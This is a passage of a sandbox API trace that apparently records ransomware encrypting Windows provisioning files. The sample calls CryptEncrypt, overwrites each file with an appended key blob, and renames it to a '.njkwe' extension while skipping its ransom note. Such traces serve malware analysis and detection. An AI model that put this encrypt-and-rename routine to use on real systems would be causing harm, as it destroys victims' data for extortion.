1 [0076.703] lstrcmpiW (lpString1="131__Connections_Cellular_Go Communication Ltd. (Finland)_i0$(__MVID)@WAP.provxml", lpString2="System Volume Information") returned -1 [0076.703] lstrcmpiW (lpString1="131__Connections_Cellular_Go Communication Ltd. (Finland)_i0$(__MVID)@WAP.provxml", lpString2="Program Files") returned -1 [0076.703] lstrcmpiW (lpString1="131__Connections_Cellular_Go Communication Ltd. (Finland)_i0$(__MVID)@WAP.provxml", lpString2="Program Files (x86)") returned -1 [0076.703] wnsprintfW (in: pszDest=0xc46ed8, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\131__Connections_Cellular_Go Communication Ltd. (Finland)_i0$(__MVID)@WAP.provxml") returned 175 [0076.703] StrStrIW (lpFirst="131__Connections_Cellular_Go Communication Ltd. (Finland)_i0$(__MVID)@WAP.provxml", lpSrch=".njkwe") returned 0x0 [0076.703] lstrcmpW (lpString1="131__Connections_Cellular_Go Communication Ltd. (Finland)_i0$(__MVID)@WAP.provxml", lpString2="---==%$$$OPEN_ME_UP$$$==---.txt") returned 1 [0076.703] lstrcmpW (lpString1="131__Connections_Cellular_Go Communication Ltd. (Finland)_i0$(__MVID)@WAP.provxml", lpString2="taridd") returned -1 [0076.703] StrCmpNW (lpStr1="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\131__Connecti", lpStr2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\jQ9oAfjNQKea58w4CPypJ91GQq5vB", nChar=107) returned -1 [0076.703] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\131__Connections_Cellular_Go Communication Ltd. (Finland)_i0$(__MVID)@WAP.provxml" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\131__connections_cellular_go communication ltd. (finland)_i0$(__mvid)@wap.provxml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x43c [0076.704] GetTickCount () returned 0x1153843 [0076.704] GetTickCount () returned 0x1153843 [0076.704] GetTickCount () returned 0x1153843 [0076.704] GetTickCount () returned 0x1153843 [0076.704] CryptEncrypt (in: hKey=0xbfdd18, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x380ed10*, pdwDataLen=0x380edc0*=0x2c, dwBufLen=0x80 | out: pbData=0x380ed10*, pdwDataLen=0x380edc0*=0x80) returned 1 [0076.704] GetProcessHeap () returned 0xbe0000 [0076.704] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x2800) returned 0xc51868 [0076.704] ReadFile (in: hFile=0x43c, lpBuffer=0xc51868, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc51868*, lpNumberOfBytesRead=0x380edc4*=0x29d, lpOverlapped=0x0) returned 1 [0076.714] SetFilePointerEx (in: hFile=0x43c, liDistanceToMove=0xfffffd63, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0076.714] WriteFile (in: hFile=0x43c, lpBuffer=0xc51868*, nNumberOfBytesToWrite=0x29d, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc51868*, lpNumberOfBytesWritten=0x380edc4*=0x29d, lpOverlapped=0x0) returned 1 [0076.714] GetProcessHeap () returned 0xbe0000 [0076.714] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc51868 | out: hHeap=0xbe0000) returned 1 [0076.715] SetFilePointerEx (in: hFile=0x43c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0076.715] WriteFile (in: hFile=0x43c, lpBuffer=0xc09940*, nNumberOfBytesToWrite=0x300, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc09940*, lpNumberOfBytesWritten=0x380edc4*=0x300, lpOverlapped=0x0) returned 1 [0076.715] WriteFile (in: hFile=0x43c, lpBuffer=0x380ed10*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0x380ed10*, lpNumberOfBytesWritten=0x380edc4*=0x80, lpOverlapped=0x0) returned 1 [0076.715] WriteFile (in: hFile=0x43c, lpBuffer=0x40603c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0x40603c*, lpNumberOfBytesWritten=0x380edc4*=0x4, lpOverlapped=0x0) returned 1 [0076.715] CloseHandle (hObject=0x43c) returned 1 [0076.715] GetProcessHeap () returned 0xbe0000 [0076.715] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x400) returned 0xc472e0 [0076.715] wnsprintfW (in: pszDest=0xc472e0, cchDest=512, pszFmt="%s_%S_{%6S}%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\131__Connections_Cellular_Go Communication Ltd. (Finland)_i0$(__MVID)@WAP.provxml_r00t_{3sXlE5}.njkwe") returned 195 [0076.715] MoveFileW (lpExistingFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\131__Connections_Cellular_Go Communication Ltd. (Finland)_i0$(__MVID)@WAP.provxml" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\131__connections_cellular_go communication ltd. (finland)_i0$(__mvid)@wap.provxml"), lpNewFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\131__Connections_Cellular_Go Communication Ltd. (Finland)_i0$(__MVID)@WAP.provxml_r00t_{3sXlE5}.njkwe" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\131__connections_cellular_go communication ltd. (finland)_i0$(__mvid)@wap.provxml_r00t_{3sxle5}.njkwe")) returned 1 [0076.716] GetProcessHeap () returned 0xbe0000 [0076.716] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc472e0 | out: hHeap=0xbe0000) returned 1 [0076.716] FindNextFileW (in: hFindFile=0xc19f20, lpFindFileData=0x380ee00 | out: lpFindFileData=0x380ee00*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x90542f74, ftCreationTime.dwHighDateTime=0x1d2e96f, ftLastAccessTime.dwLowDateTime=0x90542f74, ftLastAccessTime.dwHighDateTime=0x1d2e96f, ftLastWriteTime.dwLowDateTime=0x90542f74, ftLastWriteTime.dwHighDateTime=0x1d2e96f, nFileSizeHigh=0x0, nFileSizeLow=0x299, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="132__Connections_Cellular_Go Communication Ltd. (Finland)_i1$(__MVID)@WAP.provxml", cAlternateFileName="132__C~1.PRO")) returned 1 [0076.716] lstrcmpiW (lpString1="132__Connections_Cellular_Go Communication Ltd. (Finland)_i1$(__MVID)@WAP.provxml", lpString2="Windows") returned -1 [0076.716] lstrcmpiW (lpString1="132__Connections_Cellular_Go Communication Ltd. (Finland)_i1$(__MVID)@WAP.provxml", lpString2="$Recycle.bin") returned 1 [0076.716] lstrcmpiW (lpString1="132__Connections_Cellular_Go Communication Ltd. (Finland)_i1$(__MVID)@WAP.provxml", lpString2="System Volume Information") returned -1 [0076.716] lstrcmpiW (lpString1="132__Connections_Cellular_Go Communication Ltd. (Finland)_i1$(__MVID)@WAP.provxml", lpString2="Program Files") returned -1 [0076.716] lstrcmpiW (lpString1="132__Connections_Cellular_Go Communication Ltd. (Finland)_i1$(__MVID)@WAP.provxml", lpString2="Program Files (x86)") returned -1 [0076.716] wnsprintfW (in: pszDest=0xc46ed8, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\132__Connections_Cellular_Go Communication Ltd. (Finland)_i1$(__MVID)@WAP.provxml") returned 175 [0076.716] StrStrIW (lpFirst="132__Connections_Cellular_Go Communication Ltd. (Finland)_i1$(__MVID)@WAP.provxml", lpSrch=".njkwe") returned 0x0 [0076.716] lstrcmpW (lpString1="132__Connections_Cellular_Go Communication Ltd. (Finland)_i1$(__MVID)@WAP.provxml", lpString2="---==%$$$OPEN_ME_UP$$$==---.txt") returned 1 [0076.716] lstrcmpW (lpString1="132__Connections_Cellular_Go Communication Ltd. (Finland)_i1$(__MVID)@WAP.provxml", lpString2="taridd") returned -1 [0076.716] StrCmpNW (lpStr1="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\132__Connecti", lpStr2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\jQ9oAfjNQKea58w4CPypJ91GQq5vB", nChar=107) returned -1 [0076.716] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\132__Connections_Cellular_Go Communication Ltd. (Finland)_i1$(__MVID)@WAP.provxml" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\132__connections_cellular_go communication ltd. (finland)_i1$(__mvid)@wap.provxml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x43c [0076.716] GetTickCount () returned 0x1153843 [0076.716] GetTickCount () returned 0x1153843 [0076.716] GetTickCount () returned 0x1153843 [0076.716] GetTickCount () returned 0x1153843 [0076.717] CryptEncrypt (in: hKey=0xbfdd18, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x380ed10*, pdwDataLen=0x380edc0*=0x2c, dwBufLen=0x80 | out: pbData=0x380ed10*, pdwDataLen=0x380edc0*=0x80) returned 1 [0076.717] GetProcessHeap () returned 0xbe0000 [0076.717] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x2800) returned 0xc51868 [0076.717] ReadFile (in: hFile=0x43c, lpBuffer=0xc51868, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc51868*, lpNumberOfBytesRead=0x380edc4*=0x299, lpOverlapped=0x0) returned 1 [0076.719] SetFilePointerEx (in: hFile=0x43c, liDistanceToMove=0xfffffd67, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0076.719] WriteFile (in: hFile=0x43c, lpBuffer=0xc51868*, nNumberOfBytesToWrite=0x299, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc51868*, lpNumberOfBytesWritten=0x380edc4*=0x299, lpOverlapped=0x0) returned 1 [0076.719] GetProcessHeap () returned 0xbe0000 [0076.719] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc51868 | out: hHeap=0xbe0000) returned 1 [0076.719] SetFilePointerEx (in: hFile=0x43c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0076.719] WriteFile (in: hFile=0x43c, lpBuffer=0xc09940*, nNumberOfBytesToWrite=0x300, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc09940*, lpNumberOfBytesWritten=0x380edc4*=0x300, lpOverlapped=0x0) returned 1 [0076.719] WriteFile (in: hFile=0x43c, lpBuffer=0x380ed10*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0x380ed10*, lpNumberOfBytesWritten=0x380edc4*=0x80, lpOverlapped=0x0) returned 1 [0076.719] WriteFile (in: hFile=0x43c, lpBuffer=0x40603c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0x40603c*, lpNumberOfBytesWritten=0x380edc4*=0x4, lpOverlapped=0x0) returned 1 [0076.720] CloseHandle (hObject=0x43c) returned 1 [0076.720] GetProcessHeap () returned 0xbe0000 [0076.720] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x400) returned 0xc472e0 [0076.720] wnsprintfW (in: pszDest=0xc472e0, cchDest=512, pszFmt="%s_%S_{%6S}%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\132__Connections_Cellular_Go Communication Ltd. (Finland)_i1$(__MVID)@WAP.provxml_r00t_{3sXlE5}.njkwe") returned 195 [0076.720] MoveFileW (lpExistingFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\132__Connections_Cellular_Go Communication Ltd. (Finland)_i1$(__MVID)@WAP.provxml" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\132__connections_cellular_go communication ltd. (finland)_i1$(__mvid)@wap.provxml"), lpNewFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\132__Connections_Cellular_Go Communication Ltd. (Finland)_i1$(__MVID)@WAP.provxml_r00t_{3sXlE5}.njkwe" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\132__connections_cellular_go communication ltd. (finland)_i1$(__mvid)@wap.provxml_r00t_{3sxle5}.njkwe")) returned 1 [0076.720] GetProcessHeap () returned 0xbe0000 [0076.720] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc472e0 | out: hHeap=0xbe0000) returned 1 [0076.720] FindNextFileW (in: hFindFile=0xc19f20, lpFindFileData=0x380ee00 | out: lpFindFileData=0x380ee00*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x90542f74, ftCreationTime.dwHighDateTime=0x1d2e96f, ftLastAccessTime.dwLowDateTime=0x90542f74, ftLastAccessTime.dwHighDateTime=0x1d2e96f, ftLastWriteTime.dwLowDateTime=0x90542f74, ftLastWriteTime.dwHighDateTime=0x1d2e96f, nFileSizeHigh=0x0, nFileSizeLow=0x294, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="133__Connections_Cellular_TDC Song Finland (Finland)_i0$(__MVID)@WAP.provxml", cAlternateFileName="133__C~1.PRO")) returned 1 [0076.721] lstrcmpiW (lpString1="133__Connections_Cellular_TDC Song Finland (Finland)_i0$(__MVID)@WAP.provxml", lpString2="Windows") returned -1 [0076.721] lstrcmpiW (lpString1="133__Connections_Cellular_TDC Song Finland (Finland)_i0$(__MVID)@WAP.provxml", lpString2="$Recycle.bin") returned 1 [0076.721] lstrcmpiW (lpString1="133__Connections_Cellular_TDC Song Finland (Finland)_i0$(__MVID)@WAP.provxml", lpString2="System Volume Information") returned -1 [0076.721] lstrcmpiW (lpString1="133__Connections_Cellular_TDC Song Finland (Finland)_i0$(__MVID)@WAP.provxml", lpString2="Program Files") returned -1 [0076.721] lstrcmpiW (lpString1="133__Connections_Cellular_TDC Song Finland (Finland)_i0$(__MVID)@WAP.provxml", lpString2="Program Files (x86)") returned -1 [0076.721] wnsprintfW (in: pszDest=0xc46ed8, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\133__Connections_Cellular_TDC Song Finland (Finland)_i0$(__MVID)@WAP.provxml") returned 170 [0076.721] StrStrIW (lpFirst="133__Connections_Cellular_TDC Song Finland (Finland)_i0$(__MVID)@WAP.provxml", lpSrch=".njkwe") returned 0x0 [0076.721] lstrcmpW (lpString1="133__Connections_Cellular_TDC Song Finland (Finland)_i0$(__MVID)@WAP.provxml", lpString2="---==%$$$OPEN_ME_UP$$$==---.txt") returned 1 [0076.721] lstrcmpW (lpString1="133__Connections_Cellular_TDC Song Finland (Finland)_i0$(__MVID)@WAP.provxml", lpString2="taridd") returned -1 [0076.721] StrCmpNW (lpStr1="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\133__Connecti", lpStr2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\jQ9oAfjNQKea58w4CPypJ91GQq5vB", nChar=107) returned -1 [0076.721] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\133__Connections_Cellular_TDC Song Finland (Finland)_i0$(__MVID)@WAP.provxml" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\133__connections_cellular_tdc song finland (finland)_i0$(__mvid)@wap.provxml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x43c [0076.721] GetTickCount () returned 0x1153852 [0076.721] GetTickCount () returned 0x1153852 [0076.721] GetTickCount () returned 0x1153852 [0076.721] GetTickCount () returned 0x1153852 [0076.721] CryptEncrypt (in: hKey=0xbfdd18, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x380ed10*, pdwDataLen=0x380edc0*=0x2c, dwBufLen=0x80 | out: pbData=0x380ed10*, pdwDataLen=0x380edc0*=0x80) returned 1 [0076.721] GetProcessHeap () returned 0xbe0000 [0076.721] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x2800) returned 0xc51868 [0076.721] ReadFile (in: hFile=0x43c, lpBuffer=0xc51868, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc51868*, lpNumberOfBytesRead=0x380edc4*=0x294, lpOverlapped=0x0) returned 1 [0076.723] SetFilePointerEx (in: hFile=0x43c, liDistanceToMove=0xfffffd6c, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0076.723] WriteFile (in: hFile=0x43c, lpBuffer=0xc51868*, nNumberOfBytesToWrite=0x294, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc51868*, lpNumberOfBytesWritten=0x380edc4*=0x294, lpOverlapped=0x0) returned 1 [0076.724] GetProcessHeap () returned 0xbe0000 [0076.724] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc51868 | out: hHeap=0xbe0000) returned 1 [0076.724] SetFilePointerEx (in: hFile=0x43c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0076.724] WriteFile (in: hFile=0x43c, lpBuffer=0xc09940*, nNumberOfBytesToWrite=0x300, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc09940*, lpNumberOfBytesWritten=0x380edc4*=0x300, lpOverlapped=0x0) returned 1 [0076.724] WriteFile (in: hFile=0x43c, lpBuffer=0x380ed10*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0x380ed10*, lpNumberOfBytesWritten=0x380edc4*=0x80, lpOverlapped=0x0) returned 1 [0076.724] WriteFile (in: hFile=0x43c, lpBuffer=0x40603c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0x40603c*, lpNumberOfBytesWritten=0x380edc4*=0x4, lpOverlapped=0x0) returned 1 [0076.724] CloseHandle (hObject=0x43c) returned 1 [0076.724] GetProcessHeap () returned 0xbe0000 [0076.724] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x400) returned 0xc472e0 [0076.724] wnsprintfW (in: pszDest=0xc472e0, cchDest=512, pszFmt="%s_%S_{%6S}%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\133__Connections_Cellular_TDC Song Finland (Finland)_i0$(__MVID)@WAP.provxml_r00t_{3sXlE5}.njkwe") returned 190 [0076.724] MoveFileW (lpExistingFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\133__Connections_Cellular_TDC Song Finland (Finland)_i0$(__MVID)@WAP.provxml" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\133__connections_cellular_tdc song finland (finland)_i0$(__mvid)@wap.provxml"), lpNewFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\133__Connections_Cellular_TDC Song Finland (Finland)_i0$(__MVID)@WAP.provxml_r00t_{3sXlE5}.njkwe" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\133__connections_cellular_tdc song finland (finland)_i0$(__mvid)@wap.provxml_r00t_{3sxle5}.njkwe")) returned 1 [0076.725] GetProcessHeap () returned 0xbe0000 [0076.725] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc472e0 | out: hHeap=0xbe0000) returned 1 [0076.725] FindNextFileW (in: hFindFile=0xc19f20, lpFindFileData=0x380ee00 | out: lpFindFileData=0x380ee00*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x90542f74, ftCreationTime.dwHighDateTime=0x1d2e96f, ftLastAccessTime.dwLowDateTime=0x90542f74, ftLastAccessTime.dwHighDateTime=0x1d2e96f, ftLastWriteTime.dwLowDateTime=0x90542f74, ftLastWriteTime.dwHighDateTime=0x1d2e96f, nFileSizeHigh=0x0, nFileSizeLow=0x282, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="134__Connections_Cellular_Sonera (Finland)_i0$(__MVID)@WAP.provxml", cAlternateFileName="134__C~1.PRO")) returned 1 [0076.725] lstrcmpiW (lpString1="134__Connections_Cellular_Sonera (Finland)_i0$(__MVID)@WAP.provxml", lpString2="Windows") returned -1 [0076.725] lstrcmpiW (lpString1="134__Connections_Cellular_Sonera (Finland)_i0$(__MVID)@WAP.provxml", lpString2="$Recycle.bin") returned 1 [0076.725] lstrcmpiW (lpString1="134__Connections_Cellular_Sonera (Finland)_i0$(__MVID)@WAP.provxml", lpString2="System Volume Information") returned -1 [0076.725] lstrcmpiW (lpString1="134__Connections_Cellular_Sonera (Finland)_i0$(__MVID)@WAP.provxml", lpString2="Program Files") returned -1 [0076.725] lstrcmpiW (lpString1="134__Connections_Cellular_Sonera (Finland)_i0$(__MVID)@WAP.provxml", lpString2="Program Files (x86)") returned -1 [0076.725] wnsprintfW (in: pszDest=0xc46ed8, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\134__Connections_Cellular_Sonera (Finland)_i0$(__MVID)@WAP.provxml") returned 160 [0076.725] StrStrIW (lpFirst="134__Connections_Cellular_Sonera (Finland)_i0$(__MVID)@WAP.provxml", lpSrch=".njkwe") returned 0x0 [0076.725] lstrcmpW (lpString1="134__Connections_Cellular_Sonera (Finland)_i0$(__MVID)@WAP.provxml", lpString2="---==%$$$OPEN_ME_UP$$$==---.txt") returned 1 [0076.725] lstrcmpW (lpString1="134__Connections_Cellular_Sonera (Finland)_i0$(__MVID)@WAP.provxml", lpString2="taridd") returned -1 [0076.725] StrCmpNW (lpStr1="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\134__Connecti", lpStr2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\jQ9oAfjNQKea58w4CPypJ91GQq5vB", nChar=107) returned -1 [0076.725] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\134__Connections_Cellular_Sonera (Finland)_i0$(__MVID)@WAP.provxml" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\134__connections_cellular_sonera (finland)_i0$(__mvid)@wap.provxml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x43c [0076.726] GetTickCount () returned 0x1153852 [0076.726] GetTickCount () returned 0x1153852 [0076.726] GetTickCount () returned 0x1153852 [0076.726] GetTickCount () returned 0x1153852 [0076.726] CryptEncrypt (in: hKey=0xbfdd18, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x380ed10*, pdwDataLen=0x380edc0*=0x2c, dwBufLen=0x80 | out: pbData=0x380ed10*, pdwDataLen=0x380edc0*=0x80) returned 1 [0076.726] GetProcessHeap () returned 0xbe0000 [0076.726] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x2800) returned 0xc51868 [0076.726] ReadFile (in: hFile=0x43c, lpBuffer=0xc51868, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc51868*, lpNumberOfBytesRead=0x380edc4*=0x282, lpOverlapped=0x0) returned 1 [0076.728] SetFilePointerEx (in: hFile=0x43c, liDistanceToMove=0xfffffd7e, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0076.728] WriteFile (in: hFile=0x43c, lpBuffer=0xc51868*, nNumberOfBytesToWrite=0x282, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc51868*, lpNumberOfBytesWritten=0x380edc4*=0x282, lpOverlapped=0x0) returned 1 [0076.728] GetProcessHeap () returned 0xbe0000 [0076.728] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc51868 | out: hHeap=0xbe0000) returned 1 [0076.728] SetFilePointerEx (in: hFile=0x43c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0076.728] WriteFile (in: hFile=0x43c, lpBuffer=0xc09940*, nNumberOfBytesToWrite=0x300, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc09940*, lpNumberOfBytesWritten=0x380edc4*=0x300, lpOverlapped=0x0) returned 1 [0076.728] WriteFile (in: hFile=0x43c, lpBuffer=0x380ed10*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0x380ed10*, lpNumberOfBytesWritten=0x380edc4*=0x80, lpOverlapped=0x0) returned 1 [0076.728] WriteFile (in: hFile=0x43c, lpBuffer=0x40603c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0x40603c*, lpNumberOfBytesWritten=0x380edc4*=0x4, lpOverlapped=0x0) returned 1 [0076.728] CloseHandle (hObject=0x43c) returned 1 [0076.729] GetProcessHeap () returned 0xbe0000 [0076.729] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x400) returned 0xc472e0 [0076.729] wnsprintfW (in: pszDest=0xc472e0, cchDest=512, pszFmt="%s_%S_{%6S}%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\134__Connections_Cellular_Sonera (Finland)_i0$(__MVID)@WAP.provxml_r00t_{3sXlE5}.njkwe") returned 180 [0076.729] MoveFileW (lpExistingFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\134__Connections_Cellular_Sonera (Finland)_i0$(__MVID)@WAP.provxml" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\134__connections_cellular_sonera (finland)_i0$(__mvid)@wap.provxml"), 